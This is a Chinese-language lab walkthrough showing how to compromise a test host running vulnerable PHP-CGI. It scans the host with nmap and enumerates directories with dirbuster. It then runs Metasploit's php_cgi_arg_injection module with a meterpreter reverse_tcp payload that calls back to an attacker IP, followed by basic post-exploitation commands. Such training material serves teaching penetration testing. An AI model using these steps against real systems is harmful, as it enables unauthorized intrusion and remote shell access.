利用phpMyAdmin漏洞上傳***程序,獲得webshell。
CGI腳本沒有正確處理請求參數,導致源代碼泄露,允許遠程***者在請求參數中插入執行命令。
一、利用nmap工具掃描目標主機
1.1使用nmap命令對目標主機進行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。
1.2在終端中輸入命令“nmap –sV 192.168.1.3”,對目標主機進行端口掃描,發現開放80端口。
1.3在瀏覽器地址欄中輸入“http:\\192.168.1.3”,訪問目標網站。
二、利用dirbuster掃描目標主機
2.1在終端中輸入命令“dirbuster”,啓動軟件對目標網站進行掃描。
2.2在Target URL處輸入“192.168.1.3”,在File with list of dirs./file處選擇字典文件(/usr/share/dirbuster/wordlists/目錄下),單擊“Start”按鈕,開始掃描。
2.3掃描結果顯示包含cgi-bin目錄、phpmyadmin目錄等。
三、利用metasploit***目標主機
3.1在終端中輸入命令“msfconsole”,啓動MSF終端。
3.2在終端中輸入命令“search php_cgi”,搜索php_cgi的相關工具和***載荷。
3.3在終端中輸入命令“use exploit/multi/http/php_cgi_arg_injection”,啓用漏洞利用模塊, 提示符就會提示進入到該路徑下。
3.4在終端中輸入命令“show payloads”,顯示Metasploit中可以在遠程主機執行的代碼,即shellcode。
3.5在終端中輸入命令“set PAYLOAD php/meterpreter/reverse_tcp”,設置使用的shellcode代碼。
3.6在終端中輸入“show options”,顯示***模塊需要設置的參數。
3.7在終端中輸入“set LHOST 192.168.1.2”,設置源主機的IP地址,用於會話的反向鏈接。
3.8在終端中輸入“set RHOST 192.168.1.3”,設置目標主機的IP。
3.9在終端中輸入“exploit”,開始對目標主機進行***。
3.10在終端中輸入“sysinfo”,查看系統環境信息。
3.11在終端中輸入“ls”,顯示當前目錄下的文件內容。
3.12在終端中輸入“cat phpinfo.php”,查看文件內容。